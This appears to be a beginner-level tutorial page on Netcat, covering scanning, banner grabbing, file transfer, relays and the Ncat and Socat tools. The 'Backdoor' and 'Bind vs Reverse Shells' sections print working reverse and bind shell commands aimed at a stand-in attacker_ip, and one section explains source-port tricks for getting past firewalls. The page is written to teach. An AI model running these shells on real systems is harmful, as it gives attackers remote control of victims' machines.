Meet Netcat
The tool that talks to networks. Read data. Write data. Find open doors. No fancy buttons, just raw power.
The Swiss Army Knife
People call Netcat the "Swiss Army knife" of networking. Why? Because it does almost everything. Instead of having ten different tools to check the internet, move files, or test security, you just need one. It is a tiny program that connects computers together.
Simple
It works right in your text terminal. No menus. No loading screens.
Flexible
It can send messages, send files, or even run programs on other computers.
For Everyone
Good guys use it to test limits. Bad guys use it to break in. It is a tool for both.
TCP: The Phone Call
Netcat can speak TCP. Think of TCP like a phone call. You dial a number, wait for the other person to say "Hello", and then you talk. You know for a fact they are listening. It is safe and reliable.
nc target_computer 80
UDP: The Letter
Netcat can also speak UDP. Think of UDP like throwing a letter onto someone's porch. You don't know if they picked it up. You don't wait for a reply. You just throw it. It is very fast.
nc -u target_computer 53
Talking Across Computers
You can use Netcat to chat between two computers. No chat app needed. Computer A opens a "listening port" (waiting for a knock). Computer B knocks on that door. Now they can type messages to each other.
Port Scanning
Imagine a computer is a house with 65,000 doors (ports). Some doors are locked. Some doors are wide open. Netcat can quickly knock on a range of doors to see which ones are open.
- -z tells Netcat to just knock, not try to talk.
- -v tells Netcat to talk out loud and tell us what it finds.
# Scanning doors 20 to 80
nc -zv 192.168.1.5 20-80
Connection to 192.168.1.5 22 port [tcp/ssh] succeeded!
nc: connect to 192.168.1.5 port 23 (tcp) failed
Connection to 192.168.1.5 80 port [tcp/http] succeeded!
Banner Grabbing
What is inside the open door?
When you connect to an open port, the computer often sends a welcome message. This is called a "banner". It tells you exactly what software is running behind that door. This is super helpful to figure out what a server does.
user@home:~$ echo "" | nc server 22
SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5
# Ah! We now know it is an Ubuntu machine running OpenSSH version 8.2.
Moving Files Without USBs
You have a picture on Laptop A. You want it on Laptop B. No cloud, no flash drive. Just make a pipe between them using Netcat and push the file through.
Laptop B (Receiver) gets ready to catch:
nc -l -p 5555 > picture.jpg
Laptop A (Sender) throws the file into the pipe:
nc laptop_B_IP 5555 < picture.jpg
The Backdoor
This is why it is dangerous.
Netcat can map a network connection directly to a computer's command line (like `/bin/bash` or `cmd.exe`). If an attacker gets Netcat on your computer, they can tell it to quietly call them back. Once connected, they can type commands on their keyboard, and your computer will run them.
# Attacker waits for a call (Listener)
nc -l -p 9999
# Victim's computer is tricked into calling the attacker
nc attacker_ip 9999 -e /bin/bash
# The attacker now has full control of the victim's terminal
attacker@home:~$ whoami
victim_user
Fixing Broken Networks
When something doesn't work, Netcat helps you find the broken piece. Is your website down? Is it the web server software, or is a firewall blocking the door?
Step 1: Test the Door
Use nc -zv website.com 80. If it succeeds, the door is open. The
network is fine. The website software is broken.
Step 2: Find the Wall
If the knock times out, a firewall is likely blocking you. Now you know you need to talk to the network team, not the website team.
Attackers Use It To:
- Scan for weak open doors.
- Read banners to find old software.
- Setup secret backdoors (Reverse Shells).
- Steal data by sending it through a pipe.
Defenders Use It To:
- Check if firewalls are working correctly.
- Prove a network path is open for a new app.
- Read their own banners to ensure they hide versions.
- Debug broken servers quickly without heavy tools.
Bind vs Reverse Shells
The Bind Shell
The victim opens a door on their computer and waits. The attacker connects to it. Firewalls usually block this because they stop strangers from knocking on your doors.
nc -l -p 4444 -e /bin/bash
# Attacker walks in
nc victim_ip 4444
The Reverse Shell
The attacker opens a door and waits. The victim's computer reaches out and calls the attacker. Firewalls usually allow this because they let computers talk to the outside world.
nc -l -p 4444
# Victim calls the attacker
nc attacker_ip 4444 -e /bin/bash
Acting Like a Web Browser
A web browser is just a tool that sends text to a web server. You can do the exact same thing manually using Netcat. You connect to a website on port 80, type a specific greeting, and the website will hand you its code.
# 1. Connect to a website
nc example.com 80
# 2. Type this exact text and hit Enter twice
GET / HTTP/1.1
Host: example.com
# 3. The server replies with raw HTML!
<!doctype html>
<html><head><title>Example Domain</title>...
The Tiny Web Server
Need to share a simple web page with your team, but you don't have a real web server installed? Netcat can host a file and pretend to be a web server.
This command tells Netcat to listen on port 8080. When someone connects, it replies with the required "HTTP/1.1 200 OK" text, and then pushes the contents of `index.html` to them.
# Create a basic webpage
echo "<h1>Hello Team!</h1>" > index.html
# Serve it using an infinite loop
while true; do
echo -e "HTTP/1.1 200 OK\n\n$(cat index.html)" | nc -l -p 8080
done
Sending Entire Folders
Netcat sends streams of data, not folders. If you want to send a whole folder full of files, you have to
pack it into a single box first. We do this by piping the tar command (which packs files)
directly into Netcat.
1. Receiver Unpacks
Laptop B waits for the data stream and immediately unpacks it into a folder.
nc -l -p 5555 | tar xvf -
2. Sender Packs
Laptop A packs the folder into a stream and shoots it over to Laptop B.
tar cvf - /my_folder | nc laptop_B_IP 5555
Stay Open (-k)
Stop Netcat from quitting.
Usually, once a connection finishes, the Netcat listener turns off. If you want it to stay awake and wait for the next person to connect, add the -k flag (Keep-alive). This turns Netcat into a lasting server.
nc -k -l -p 8888
IPv4 vs IPv6
The internet is changing how it labels computers. The old way is IPv4 (e.g., 192.168.1.1).
The new way is IPv6 (e.g., fe80::1ff:fe23:4567). Netcat can use both. You can force it to
use one or the other.
The Middleman (Relays)
You can make your computer act as a bridge. A person connects to you, and your computer instantly
forwards their traffic to a third computer. We do this by plugging two Netcat commands into each other
using a special file called a fifo pipe.
# Create a special pipe file
mkfifo my_pipe
# Listen on port 9999, push traffic into pipe, send it to Website.com
nc -l -p 9999 < my_pipe | nc website.com 80 > my_pipe
# Act like we are sending from port 53 (DNS)
nc -p 53 target_computer 80
Sneaky Source Ports
Usually, when you connect to a server, your computer picks a random port to send *from*. However, some strict firewalls only allow traffic to pass if it comes from trusted ports like 53 (DNS) or 80 (HTTP).
You can trick the firewall by using the -p flag to force Netcat to send from a specific port.
Recording the Bytes
If a network connection fails, you might want to look at the exact data being sent back and forth. You can use the -o flag to record a "hex dump". This saves every single piece of data into a text file so you can study it later.
# Save all traffic to a file named 'network_log.txt'
nc -o network_log.txt website.com 80
# Inside network_log.txt, it looks like this:
< 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP/1.1 200 OK.
< 00000010 0a 44 61 74 65 3a 20 54 68 75 2c 20 30 39 20 4e # .Date: Thu, 09 N
The Upgrades: Ncat & Socat
Classic Netcat is amazing, but it has one big flaw: everything is sent in plain text. Anyone listening on the network can read your messages. Modern professionals often upgrade to newer tools when they need security.
Ncat
Made by the Nmap team. It is Netcat, but it adds SSL encryption. Bad guys can't read your traffic.
ncat --ssl target_ip 443
Socat
Netcat on steroids. It can connect anything to anything (files, networks, devices). Harder to learn, but infinitely powerful.
socat -d -d TCP4-LISTEN:80 ...